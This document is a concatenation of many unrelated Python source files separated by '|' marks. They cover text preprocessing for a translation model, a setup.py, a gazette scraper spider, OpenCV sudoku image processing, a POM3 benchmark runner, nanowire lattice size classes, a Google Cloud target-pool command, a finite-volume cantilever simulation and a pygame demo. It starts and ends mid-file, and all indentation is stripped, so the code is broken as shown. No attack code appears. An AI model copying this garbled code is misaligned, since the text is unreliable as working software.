plot_predict(x=xtest, mean=mu_c[0], var=var_c[0], z=m.zc[0].value)
plt.legend(['prediction', 'inducing points'], loc=2)
plt.savefig("demo-modgp.png")
plt.show()
|
import time
import math
import unicodedata
import torch
import re
try:
from .config import MAX_LENGTH, EOS_token
except ImportError:
from config import MAX_LENGTH, EOS_token
def asMinutes(s):
m = math.floor(s / 60)
s -= m * 60
return '%dm %ds' % (m, s)
def timeSince(since, percent):
now = time.time()
s = now - since
es = s / (percent)
rs = es - s
return '%s (- %s)' % (asMinutes(s), asMinutes(rs))
eng_prefixes = (
"i am ", "i m ",
"he is", "he s ",
"she is", "she s ",
"you are", "you re ",
"we are", "we re ",
"they are", "they re "
)
def filterPair(p):
return len(p[0].split(' ')) < MAX_LENGTH and \
len(p[1].split(' ')) < MAX_LENGTH and \
p[1].startswith(eng_prefixes)
def filterPairs(pairs):
return [pair for pair in pairs if filterPair(pair)]
def indexesFromSentence(lang, sentence):
return [lang.word2index[word] for word in sentence.split(' ')]
def tensorFromSentence(lang, sentence, device):
indexes = indexesFromSentence(lang, sentence)
indexes.append(EOS_token)
return torch.tensor(indexes, dtype=torch.long, device=device).view(-1, 1)
def tensorsFromPair(input_lang, output_lang, pair, device):
input_tensor = tensorFromSentence(input_lang, pair[0], device)
target_tensor = tensorFromSentence(output_lang, pair[1], device)
return (input_tensor, target_tensor)
# Turn a Unicode string to plain ASCII, thanks to
# https://stackoverflow.com/a/518232/2809427
def unicodeToAscii(s):
return ''.join(
c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn'
)
# Lowercase, trim, and remove non-letter characters
def normalizeString(s):
s = unicodeToAscii(s.lower().strip())
s = re.sub(r"([.!?])", r" \1", s)
s = re.sub(r"[^a-zA-Z.!?]+", r" ", s)
return s
def filterComment(s):
return s.startswith("CC-BY") |
'''
Author : now more
Connect : lin.honghui@qq.com
LastEditors : now more
Description : build_transforms
LastEditTime: 2019-07-06 20:07:26
'''
from .build import *
|
"""A setuptools-based setup module for kairos-yaml."""
from pathlib import Path
from setuptools import find_packages, setup
import sdf
long_description = Path("README.md").read_text(encoding="utf-8")
classifiers = [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities",
"Typing :: Typed",
]
requirements = [
req.replace("==", ">=")
for req in Path("requirements.txt").read_text(encoding="utf-8").splitlines()
]
setup(
name="kairos-yaml",
version=sdf.__version__,
description=sdf.__description__,
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/isi-vista/kairos-yaml",
author="USC Information Sciences Institute and Carnegie Mellon University",
author_email="ahedges@isi.edu",
license="MIT",
classifiers=classifiers,
install_requires=requirements,
python_requires=">=3.7",
packages=find_packages(),
package_data={"sdf": ["py.typed"]},
entry_points={
"console_scripts": [
"yaml2sdf=sdf.yaml2sdf:main",
"yaml_v1_to_v2=sdf.yaml_v1_to_v2:main",
]
},
)
|
from gazette.spiders.base import FecamGazetteSpider
class ScGuabirubaSpider(FecamGazetteSpider):
name = "sc_guabiruba"
FECAM_QUERY = 'entidade:"Prefeitura municipal de Guabiruba"'
TERRITORY_ID = "4206306"
|
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 19 18:28:05 2021
@author: amrut
"""
import math
import cv2
import numpy as np
#import matplotlib.pyplot as plt
#import pytesseract
class ImageDataTransform:
def __init__(self,img):
self.img = img
def resize(self,im):
#im = cv2.resize(im,(0,0),fx = 0.75, fy = 0.75)
im = cv2.resize(im,(1000,1000))
return im
def grayscale(self,im):
im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
return im
def gaussian_blur(self,im):
#im = cv2.GaussianBlur(im,(7,7),0)
im = cv2.GaussianBlur(im,(1,5),0)
return im
def threshold(self,im):
# threshold determined adaptively, max values rounded to 255
im = cv2.adaptiveThreshold(im,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\
cv2.THRESH_BINARY_INV,15,2)
return im
def canny(im):
im = cv2.Canny(im,60,180)
return im
def max_contour(self,im):
im = np.uint8(im)
cnts,_ = cv2.findContours(im, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
shapes = sorted(cnts,key = cv2.contourArea,reverse = True)
#print(shapes[0].shape)
max_cnt = shapes[0]
return max_cnt
#source: https://www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/
def vertex_coords(self,polygon):
br_candidates = [coord[0][0]+coord[0][1] for coord in polygon]
br = max(range(len(br_candidates)),key = br_candidates.__getitem__)
bl_candidates = [coord[0][0]-coord[0][1] for coord in polygon]
bl = min(range(len(bl_candidates)),key = bl_candidates.__getitem__)
tr_candidates = [coord[0][0]-coord[0][1] for coord in polygon]
tr = max(range(len(tr_candidates)),key = tr_candidates.__getitem__)
tl_candidates = [coord[0][0]+coord[0][1] for coord in polygon]
tl = min(range(len(tl_candidates)),key = tl_candidates.__getitem__)
return (tl,tr,bl,br)
def morph(self,im):
kernel = np.ones((2,2),np.uint8)
#kernel2 = np.zeros((5,5),np.uint8)
morp = cv2.morphologyEx(im,cv2.MORPH_OPEN,kernel)
return morp
def dilate(self,im):
kernel = np.ones((1,3), np.uint8)
img_dil = cv2.dilate(im, kernel, iterations=2)
return img_dil
def euclidean_dist(self,pt1,pt2):
dist_sq = (pt2[0]-pt1[0])**2 + (pt2[1]-pt1[1])**2
dist = math.sqrt(dist_sq)
return dist
def perspective_new_coords(self,vertices):
tl,tr,bl,br = vertices
width1 = self.euclidean_dist(tl,tr)
width2 = self.euclidean_dist(bl,br)
max_width = int(max(width1,width2))
height1 = self.euclidean_dist(tl,bl)
height2 = self.euclidean_dist(tr,br)
max_height = int(max(height1,height2))
new_coords = [[0,0],[max_width,0],
[0,max_height],[max_width,max_height]]
return new_coords,max_width,max_height
# credit: https://stackoverflow.com/questions/59182827/how-to-get-the-cells-of-a-sudoku-grid-with-opencv
def remove_grid(self,im):
# whiten out the grid
horizontal_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5,1))
detected_lines = cv2.morphologyEx(im, cv2.MORPH_OPEN, horizontal_kernel, iterations=1)
cnts = cv2.findContours(detected_lines, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
vertical_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1,5))
detected_lines = cv2.morphologyEx(im, cv2.MORPH_OPEN, vertical_kernel, iterations=1)
cnts2 = cv2.findContours(detected_lines, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts2 = cnts2[0] if len(cnts) == 2 else cnts2[1]
for c in cnts2:
cv2.drawContours(im, [c], -1, (255,255,255), 3)
cnts = cnts[0] if len(cnts) == 2 else cnts[1]
for c in cnts:
cv2.drawContours(im, [c], -1, (255,255,255), 3)
return im
def perspective_shift(self,im,grid_contour):
tl_idx,tr_idx,bl_idx,br_idx = self.vertex_coords(grid_contour)
orig_coords = [grid_contour[tl_idx][0],grid_contour[tr_idx][0],
grid_contour[bl_idx][0],grid_contour[br_idx][0]]
new_coords,nw,nh = self.perspective_new_coords(orig_coords)
mat_trans = cv2.getPerspectiveTransform(np.float32(orig_coords),
np.float32(new_coords))
adjust_im = cv2.warpPerspective(im,mat_trans,(nw,nh))
return adjust_im
def preprocess(self,im,grid):
resized_im = self.resize(im)
gs_im = self.grayscale(resized_im)
blurred = self.gaussian_blur(gs_im)
thresh = self.threshold(blurred)
if not grid:
#return thresh
return gs_im
grid_contour = self.max_contour(thresh)
bird_eye_im = self.perspective_shift(thresh,grid_contour)
bird_eye_im = self.resize(bird_eye_im)
invert_col = cv2.bitwise_not(bird_eye_im)
dilated_im = self.dilate(invert_col)
return dilated_im
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2016, Jianfeng Chen <jchen37@ncsu.edu>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import division
from deap.tools import emo
from Benchmarks.POM3 import pre_defined
from repeats import request_new_file
import time
import random
import pdb
import debug
def action(model):
start_time = time.time()
# generating the 10k random solutions
candidates = list()
for _ in range(10000):
ran_dec = [random.random() for _ in range(model.decsNum)]
can = model.Individual(ran_dec)
candidates.append(can)
print('random sol created.')
for can in candidates:
model.eval(can)
print('finish evaluating.')
res = emo.sortNondominated(candidates, len(candidates), True)
print('finish selection.')
finish_time = time.time()
with open(request_new_file('./tse_rs/god', model.name), 'w') as f:
f.write('T:' + str(start_time) + '\n~~~\n')
f.write('T:' + str(finish_time) + '\n')
for front in res[0]:
f.write(' '.join(map(str, front.fitness.values)))
f.write('\n')
f.write('~~~\n')
return res
if __name__ == '__main__':
for repeat in range(1):
ii = [0, 1, 2]
for i in ii:
print(i)
POM3_model = pre_defined()[i]
res = action(POM3_model)
print('****** ' + str(repeat) + ' ******')
|
from sims.sim_info_tests import SimInfoTest
import caches
import sims.sim_info_types
@caches.cached
def get_disallowed_ages(affordance):
disallowed_ages = set()
for test in affordance.test_globals:
if isinstance(test, SimInfoTest):
if test.ages is None:
continue
for age in sims.sim_info_types.Age:
if age not in test.ages:
disallowed_ages.add(age)
return disallowed_ages
|
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#67. Add Binary
#Given two binary strings, return their sum (also a binary string).
#The input strings are both non-empty and contains only characters 1 or 0.
#Example 1:
#Input: a = "11", b = "1"
#Output: "100"
#Example 2:
#Input: a = "1010", b = "1011"
#Output: "10101"
#class Solution:
# def addBinary(self, a, b):
# """
# :type a: str
# :type b: str
# :rtype: str
# """
# Time Is Money |
SIZE_PROPERTIES = [
"scale",
"width",
"length",
"unit_dz",
"period",
"fraction",
"area",
"n_xy",
"nz",
"q",
"indexer"
]
class NanowireSizeCompound:
"""
A size container that combines one or more NanowireSize objects
"""
def __init__(self, **kwargs):
for k in kwargs:
if k in SIZE_PROPERTIES:
self.__setattr__(k, kwargs[k])
def __str__(self):
s = "<NanowireSize instance>\n"
s_args = []
props = self.props()
for prop, val in props.items():
try:
if int(val) == val:
s_args.append("<\t{:<10}: {:<15,d}>".format(prop, int(val)))
else:
s_args.append("<\t{:<10}: {:<15,.2f}>".format(prop, val))
except TypeError:
s_args.append("<\t{:<10}: {}>".format(prop, val))
s += "\n".join(s_args)
return s
def props(self):
p_dict = {}
for prop in SIZE_PROPERTIES:
if hasattr(self, prop):
p_dict[prop] = self.__getattribute__(prop)
return p_dict
class PlaneSize(object):
"""
A size information handler for planar lattices
"""
def __init__(self, scale, n_xy=None, width=None):
"""
:param scale: lattice scale (ex: lattice constant)
:param n_xy: structure specific integer thickness index indicating width
:param width: width in sase units as `a0`
"""
if not (width or n_xy):
raise ValueError("must specify either `n_xy` or `width`")
if scale <= 0:
raise ValueError("`scale` must be a positive number")
self._scale = scale
if n_xy is not None and n_xy <= 0:
raise ValueError("`n_xy` must be a positive integer")
self._n_xy = n_xy
if width is not None and width <= 0:
raise ValueError("`width` must be a positive number")
self._width = width
# size calculator functions
self._n_xy_func = None
self._width_func = None
self._area_func = None
def __str__(self):
return (self.__repr__() + "\n"
"scale: {:<20}\n"
"n_xy : {:<20}\n"
"width: {:<20}\n"
"area : {:<20}"
).format(self.scale, self.n_xy, self.width, self.area)
@property
def n_xy(self):
if self._n_xy is None:
self._n_xy = self._n_xy_func(self.scale, self._width)
return self._n_xy
@property
def width(self):
return self._width_func(self.scale, self.n_xy)
@property
def scale(self):
return self._scale
@property
def area(self):
return self._area_func(self.scale, self.n_xy)
class NanowireSize(PlaneSize):
"""
A size information handler for nanowire lattices
"""
def __init__(self, scale, unit_dz, n_xy=None, nz=None,
width=None, length=None):
"""
:param scale: lattice scale (ex: lattice constant)
:param nz: number of planes stacked along z-axis
:param n_xy: structure specific integer thickness index indicating width
:param length: length in same units as `a0`
:param width: width in sase units as `a0`
"""
super().__init__(scale, n_xy, width)
if not (nz or length):
raise ValueError("must specify either `nz` or `length`")
self._unit_dz = unit_dz
self._nz = nz
self._length = length
# size calculator functions
self._nz_func = None
self._length_func = None
def __str__(self):
s = "<NanowireSize instance>\n"
s_args = []
props = self.props()
for prop, val in props.items():
try:
if int(val) == val:
s_args.append("<\t{:<10}: {:<15,d}>".format(prop, val))
else:
s_args.append("<\t{:<10}: {:<15,.2f}>".format(prop, val))
except TypeError:
s_args.append("<\t{:<10}: {}>".format(prop, val))
s += "\n".join(s_args)
return s
def props(self):
p_dict = {}
for prop in SIZE_PROPERTIES:
if hasattr(self, prop):
p_dict[prop] = self.__getattribute__(prop)
return p_dict
@property
def area(self):
return self._area_func()
@property
def unit_dz(self):
return self._unit_dz
@property
def nz(self):
if self._nz is None:
self._nz = self._nz_func(self.scale, self._length, self.unit_dz)
return self._nz
@property
def length(self):
return self._length_func(self.scale, self.nz, self.unit_dz)
def fix_nz(self, nz):
self._nz = nz
class NanowireSizeRandom(NanowireSize):
def __init__(self, scale, unit_dz, fraction, n_xy=None, nz=None,
width=None, length=None):
super().__init__(scale, unit_dz, n_xy, nz, width, length)
self._fraction = fraction
@property
def fraction(self):
return self._fraction
class NanowireSizePeriodic(NanowireSize):
"""
A size information handler for periodic nanowire lattices
"""
def __init__(self, scale, unit_dz, n_xy=None, nz=None, q=None,
width=None, length=None, period=None):
super().__init__(scale, unit_dz, n_xy, nz, width, length)
if q is None and period is None:
raise ValueError("must specify either `q` or `period`")
elif q == 0:
raise ValueError("`q` set to zero")
elif period == 0:
raise ValueError("`period` set to zero")
self._q = q
self._q_func = None
self._period = period
self._period_func = None
@property
def q(self):
if self._q is None:
self._q = self._q_func(self.scale, self._period)
return self._q
@property
def period(self):
return self._period_func(self.scale, self.q)
class NanowireSizeArbitrary(NanowireSize):
"""
A size information handler for arbitrary nanowire lattices
"""
def __init__(self, scale, unit_dz, n_xy=None, nz=None,
width=None, length=None):
super().__init__(scale, unit_dz, n_xy, nz, width, length)
self._index = None
self._indexer = None
@property
def index(self):
if self._index is None:
new_nz, self._index = self._indexer(self.nz)
if new_nz: # option to bypass forcing nz change
self._nz = new_nz
return self._index
@property
def indexer(self):
return self._indexer
def invert_index(self):
self._index = [self.nz - idx for idx in self._index][::-1]
|
# Copyright 2014 Google Inc. All Rights Reserved.
"""Command for removing instances from target pools."""
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.compute.lib import base_classes
from googlecloudsdk.compute.lib import utils
class RemoveInstances(base_classes.NoOutputAsyncMutator):
"""Remove instances from a target pool."""
@staticmethod
def Args(parser):
parser.add_argument(
'--instances',
help='Specifies a list of instances to remove from the target pool.',
metavar='INSTANCE',
nargs='+',
required=True)
utils.AddZoneFlag(
parser,
resource_type='instances',
operation_type='remove from the target pool')
parser.add_argument(
'name',
help='The name of the target pool from which to remove the instances.')
@property
def service(self):
return self.compute.targetPools
@property
def method(self):
return 'RemoveInstance'
@property
def resource_type(self):
return 'targetPools'
def CreateRequests(self, args):
instance_refs = self.CreateZonalReferences(
args.instances, args.zone, resource_type='instances')
instances = [
self.messages.InstanceReference(instance=instance_ref.SelfLink())
for instance_ref in instance_refs]
# This check to make sure the regions for the instances are the same is not
# really necessary, but it does allow for a fast fail if the user passes in
# instances from different regions.
unique_regions = set(utils.ZoneNameToRegionName(instance_ref.zone)
for instance_ref in instance_refs)
if len(unique_regions) > 1:
raise calliope_exceptions.ToolException(
'Instances must all be in the same region as the target pool.')
target_pool_ref = self.CreateRegionalReference(
args.name, unique_regions.pop(),
resource_type='targetPools')
request = self.messages.ComputeTargetPoolsRemoveInstanceRequest(
region=target_pool_ref.region,
project=self.project,
targetPool=target_pool_ref.Name(),
targetPoolsRemoveInstanceRequest=(
self.messages.TargetPoolsRemoveInstanceRequest(
instances=instances)))
return [request]
RemoveInstances.detailed_help = {
'brief': 'Remove instances from a target pool',
'DESCRIPTION': """\
*{command}* is used to remove one or more instances from a
target pool.
For more information on health checks and load balancing, see
link:https://developers.google.com/compute/docs/load-balancing/[].
""",
}
|
#!/usr/bin/env python
import sys
sys.setdlopenflags(0x100|0x2)
import fvm
import fvm.fvmbaseExt as fvmbaseExt
import fvm.importers as importers
fvm.set_atype('double')
import math
if fvm.atype == 'double':
import fvm.models_atyped_double as models
import fvm.exporters_atyped_double as exporters
elif fvm.atype == 'tangent':
import fvm.models_atyped_tangent_double as models
import fvm.exporters_atyped_tangent_double as exporters
from FluentCase import FluentCase
from optparse import OptionParser
#fvmbaseExt.enableDebug("cdtor")
fileBase = None
numIterations = 1
fileBase = "/scratch/prism/shankha/memosa/src/fvm/test/CANT-SORDER/cbeam6/cbeam6"
#fileBase = "/home/sm/app-memosa/src/fvm/test/cav32"
#fileBase = "/home/sm/a/data/wj"
def usage():
print "Usage: %s filebase [outfilename]" % sys.argv[0]
print "Where filebase.cas is a Fluent case file."
print "Output will be in filebase-prism.dat if it is not specified."
sys.exit(1)
def advance(smodel,niter):
for i in range(0,niter):
try:
smodel.advance(1)
except KeyboardInterrupt:
break
def createBV4Fields(geomFields,meshes,id):
fy = fvmbaseExt.Field('bvy')
mesh = meshes[0]
vol = geomFields.volume[mesh.getCells()]
for mesh in meshes:
fgs = mesh.getBoundaryGroups()
for fg in fgs:
xf = geomFields.coordinate[fg.site].asNumPyArray()
if fg.id==id:
nFaces = fg.site.getCount()
forceY = vol.newSizedClone(nFaces)
forceYa = forceY.asNumPyArray()
xf = geomFields.coordinate[fg.site].asNumPyArray()
for i in range(0,nFaces):
forceYa[i]=-1000./0.2
fy[fg.site] = forceY
return fy
# change as needed
# map between fvm, tecplot, and xdmf types
etype = {
'tri' : 1,
'quad' : 2,
'tetra' : 3,
'hexa' : 4
}
tectype = {
'tri' : 'FETRIANGLE',
'quad' : 'FEQUADRILATERAL',
'tetra' : 'FETETRAHEDRON',
'hexa' : 'FEBRICK'
}
def dumpTecplotFile(nmesh, meshes, geomFields, mtype):
#cell sites
cellSites = []
for n in range(0,nmesh):
cellSites.append( meshes[n].getCells() )
# print "cellSites[", n, "].getCount = ", cellSites[n].getCount()
#face sites
faceSites = []
for n in range(0,nmesh):
faceSites.append( meshes[n].getFaces() )
#node sites
nodeSites = []
for n in range(0,nmesh):
nodeSites.append( meshes[n].getNodes() )
#get connectivity (faceCells)
faceCells = []
for n in range(0,nmesh):
faceCells.append( meshes[n].getConnectivity( faceSites[n], cellSites[n] ) )
#get connectivity ( cellNodes )
cellNodes = []
for n in range(0,nmesh):
cellNodes.append( meshes[n].getCellNodes() )
#get Volume as array
volumes = []
for n in range(0,nmesh):
volumes.append( geomFields.volume[cellSites[n]].asNumPyArray() )
cellCentroids =[]
for n in range(0,nmesh):
cellCentroids.append( geomFields.coordinate[cellSites[n]].asNumPyArray() )
defFields = []
for n in range(0,nmesh):
defFields.append( structureFields.deformation[cellSites[n]].asNumPyArray() )
tractionXFields = []
for n in range(0,nmesh):
tractionXFields.append( structureFields.tractionX[cellSites[n]].asNumPyArray() )
coords = []
for n in range(0,nmesh):
coords.append( geomFields.coordinate[nodeSites[n]].asNumPyArray() )
# print "shape( coords[", n, "] ) = ", shape( coords[n] )
f = open("tecplot_cbeam4.dat","w")
f.write("Title = \" tecplot file for 2D Cavity problem \" \n")
f.write("variables = \"x\", \"y\", \"z\", \"defX\", \"defY\", \"sigmaXX\", \"sigmaXY\", \"sigmaYY\", \"cellCentroidY\" \n")
for n in range(0,nmesh):
title_name = "nmesh%s" % n
ncell = cellSites[n].getSelfCount()
nnode = nodeSites[n].getCount()
f.write("Zone T = \"%s\" N = %s E = %s DATAPACKING = BLOCK, VARLOCATION = ([4-9]=CELLCENTERED), ZONETYPE=%s\n" %
(title_name, nodeSites[n].getCount(), ncell, tectype[mtype]))
#write x
for i in range(0,nnode):
f.write(str(coords[n][i][0])+" ")
if ( i % 5 == 4 ):
f.write("\n")
f.write("\n")
#write y
for i in range(0,nnode):
f.write(str(coords[n][i][1])+" ")
if ( i % 5 == 4 ):
f.write("\n")
f.write("\n")
#write z
for i in range(0,nnode):
f.write(str(coords[n][i][2])+" ")
if ( i % 5 == 4 ):
f.write("\n")
f.write("\n")
#write defX
for i in range(0,ncell):
f.write(str(defFields[n][i][0]) + " ")
if ( i % 5 == 4 ):
f.write("\n")
f.write("\n")
#write defY
for i in range(0,ncell):
f.write(str(defFields[n][i][1]) + " ")
if ( i % 5 == 4 ):
f.write("\n")
f.write("\n")
#write sigmaXX
for i in range(0,ncell):
f.write(str(tractionXFields[n][i][0]) + " ")
if ( i % 5 == 4 ):
f.write("\n")
f.write("\n")
#write sigmaXY
for i in range(0,ncell):
f.write(str(tractionXFields[n][i][1]) + " ")
if ( i % 5 == 4 ):
f.write("\n")
f.write("\n")
#write sigmaYY
for i in range(0,ncell):
f.write(str(tractionXFields[n][i][2]) + " ")
if ( i % 5 == 4 ):
f.write("\n")
f.write("\n")
#write velX
for i in range(0,ncell):
f.write( str(cellCentroids[n][i][1]) + " ")
if ( i % 5 == 4 ):
f.write("\n")
f.write("\n")
#connectivity
for i in range(0,ncell):
nnodes_per_cell = cellNodes[n].getCount(i)
for node in range(0,nnodes_per_cell):
f.write( str(cellNodes[n](i,node)+1) + " ")
f.write("\n")
f.write("\n")
f.close()
parser = OptionParser()
parser.set_defaults(type='quad')
parser.add_option("--type", help="'quad'[default], 'tri', 'hexa', or 'tetra'")
parser.add_option("--xdmf", action='store_true', help="Dump data in xdmf")
parser.add_option("--time","-t",action='store_true',help="Print timing information.")
(options, args) = parser.parse_args()
outfile = None
if __name__ == '__main__' and fileBase is None:
if len(sys.argv) < 2:
usage()
fileBase = sys.argv[1]
if len(sys.argv) == 3:
outfile = sys.argv[2]
if outfile == None:
outfile = fileBase+"-prism.dat"
reader = FluentCase(fileBase+".cas")
#import debug
reader.read();
meshes = reader.getMeshList()
mesh = meshes[0]
nmesh = 1
import time
t0 = time.time()
geomFields = models.GeomFields('geom')
metricsCalculator = models.MeshMetricsCalculatorA(geomFields,meshes)
metricsCalculator.init()
cells = mesh.getCells()
rho = 7854.0
E = 2.1*math.pow(10,11)
nu = 0.25
if fvm.atype == 'tangent':
metricsCalculator.setTangentCoords(0,7,1)
structureFields = models.StructureFields('structure')
smodel = models.StructureModelA(geomFields,structureFields,meshes)
dmodel = models.StructureDeformationModelA(geomFields,structureFields,meshes)
#reader.importStructureBCs(smodel)
bcMap = smodel.getBCMap()
#left
bcID = 6
if bcID in bcMap:
bc = smodel.getBCMap()[bcID]
bc.bcType = 'SpecifiedDeformation'
bc['specifiedXDeformation']=0
bc['specifiedYDeformation']=0
bc['specifiedZDeformation']=0
#top
bcID = 5
if bcID in bcMap:
bc = smodel.getBCMap()[bcID]
bc.bcType = 'SpecifiedTraction'
bc['specifiedXXTraction']=0
bc['specifiedXYTraction']=0
bc['specifiedXZTraction']=0
bc['specifiedYXTraction']=0
bc['specifiedYYTraction']=0
bc['specifiedYZTraction']=0
bc['specifiedZXTraction']=0
bc['specifiedZYTraction']=0
bc['specifiedZZTraction']=0
# right
#bcID = 4
#if bcID in bcMap:
# bc = smodel.getBCMap()[bcID]
# bc.bcType = 'SpecifiedDeformation'
# bc['specifiedXDeformation']=0
# bc['specifiedYDeformation']=0
# bc['specifiedZDeformation']=0
#right
bcID = 4
if bcID in bcMap:
bc = smodel.getBCMap()[bcID]
force = createBV4Fields(geomFields,meshes,bcID)
bc.bcType = 'SpecifiedDistForce'
bc['specifiedXDistForce']=0.
bc['specifiedYDistForce']=force
bc['specifiedZDistForce']=0.
#bottom
bcID = 3
if bcID in bcMap:
bc = smodel.getBCMap()[bcID]
bc.bcType = 'SpecifiedTraction'
bc['specifiedXXTraction']=0
bc['specifiedXYTraction']=0
bc['specifiedXZTraction']=0
bc['specifiedYXTraction']=0
bc['specifiedYYTraction']=0
bc['specifiedYZTraction']=0
bc['specifiedZXTraction']=0
bc['specifiedZYTraction']=0
bc['specifiedZZTraction']=0
vcMap = smodel.getVCMap()
for i,vc in vcMap.iteritems():
vc['density'] = rho
vc['eta'] = E/(2.*(1+nu))
vc['eta1'] = nu*E/((1+nu)*(1-1.0*nu))
pc = fvmbaseExt.AMG()
pc.verbosity=0
defSolver = fvmbaseExt.BCGStab()
defSolver.preconditioner = pc
defSolver.relativeTolerance = 1e-9
defSolver.absoluteTolerance = 1.e-30
defSolver.nMaxIterations = 6000
defSolver.verbosity=1
soptions = smodel.getOptions()
soptions.deformationLinearSolver = defSolver
soptions.deformationTolerance=1.0e-3
soptions.setVar("deformationURF",1.0)
soptions.printNormalizedResiduals=True
soptions.transient=False
"""
if fvm.atype=='tangent':
vcMap = fmodel.getVCMap()
for i,vc in vcMap.iteritems():
print vc.getVar('viscosity')
vc.setVar('viscosity',(1.7894e-5,1))
"""
smodel.init()
dmodel.init()
smodel.printBCs
smodel.advance(numIterations)
dmodel.calculateNodeDisplacement()
#smodel.getTractionX(mesh)
faceCells = mesh.getAllFaceCells()
deformation = structureFields.deformation[mesh.getCells()].asNumPyArray()
fileName = fileBase + "deformation1.txt"
file = open(fileName,"w")
file.write("deformation\t\n")
for mesh in meshes:
fgs = mesh.getBoundaryGroups()
for fg in fgs:
nFaces = fg.site.getCount()
xf = geomFields.coordinate[fg.site].asNumPyArray()
if fg.id==4:
faceCells = mesh.getFaceCells(fg.site)
for i in range(0,nFaces):
x = xf[i][0]
y = xf[i][1]
def0 = deformation[faceCells(i,1)][0]
def1 = deformation[faceCells(i,1)][1]
file.write(" %e " % x)
file.write(" %e " % y)
file.write(" %e " % def0)
file.write(" %e " % def1)
file.write("\n")
file.close()
faceCells = mesh.getAllFaceCells()
deformation = structureFields.deformation[mesh.getCells()].asNumPyArray()
fileName = fileBase + "deformation1_bottom.txt"
file = open(fileName,"w")
file.write("deformation\t\n")
for mesh in meshes:
fgs = mesh.getBoundaryGroups()
for fg in fgs:
nFaces = fg.site.getCount()
xf = geomFields.coordinate[fg.site].asNumPyArray()
if fg.id==3:
faceCells = mesh.getFaceCells(fg.site)
for i in range(0,nFaces):
x = xf[i][0]
y = xf[i][1]
def0 = deformation[faceCells(i,1)][0]
def1 = deformation[faceCells(i,1)][1]
file.write(" %e " % x)
file.write(" %e " % y)
file.write(" %e " % def0)
file.write(" %e " % def1)
file.write("\n")
file.close()
t1 = time.time()
if outfile != '/dev/stdout':
print '\nsolution time = %f' % (t1-t0)
#dumpTecplotFile( nmesh, meshes, geomFields, options.type)
|
#!/usr/bin/env python
from graph_obj import Graph, Node, Edge
from graph_utils import revcomp
import argparse
def parse_args():
parser = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-b", "--bialfile", help="biallelic sv stat file")
parser.add_argument("-m", "--multifile", help="multiallelic sv stat file")
parser.add_argument("-g", "--graphfile", help="graphfile")
parser.add_argument("-o", "--outputfile", help="output file")
return parser.parse_args()
def parse_bial_sv(stat, graph):
nodeid = stat.strip().split()[3].split(",")[1]
strand = stat.strip().split()[4].split(",")[1]
sv_name = stat.strip().split()[0]
if strand == "-":
sequence = revcomp(graph[nodeid].nodeseq)
else:
sequence = graph[nodeid].nodeseq
return (sv_name, sequence)
def parse_multi_sv(stat, graph):
linecomp = stat.strip().split()
sv_name = linecomp[0]
nodelist = linecomp[3].split(",")[1:-1]
strandlist = linecomp[4].split(",")[1:-1]
allcomp = zip(nodelist, strandlist)
sequence = ""
for nodeid, strand in allcomp:
if strand == "-":
sequence += revcomp(graph[nodeid].nodeseq)
else:
sequence += graph[nodeid].nodeseq
return (sv_name, sequence)
if __name__ == "__main__":
args = parse_args()
bialfile = args.bialfile
multifile = args.multifile
graphfile = args.graphfile
outputfile = args.outputfile
# construct graph
graph = Graph.construct_from_rgfa(graphfile, include_seq=1)
# process biallelic sv
with open(bialfile) as infile, open(outputfile, "a") as outfile:
for line in infile:
sv_name, sequence = parse_bial_sv(line, graph)
outfile.write(f">{sv_name}\n{sequence}\n")
# process multiallelic sv
with open(multifile) as infile, open(outputfile, "a") as outfile:
for line in infile:
sv_name, sequence = parse_multi_sv(line, graph)
outfile.write(f">{sv_name}\n{sequence}\n")
|
import pygame, sys
from pygame.locals import *
import traceback
import jaime
pygame.init()
pygame.mixer.init()
BLACK = pygame.Color("black")
speed = [2, 0]
size = width, height = 600, 400
screen = pygame.display.set_mode(size, RESIZABLE)
pygame.display.set_caption("Jaime walking --- Lee Demo")
clock = pygame.time.Clock()
jme = jaime.Jaime(speed, size, [0, 0])
index = 0
num = 360
pos = [0, 0]
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
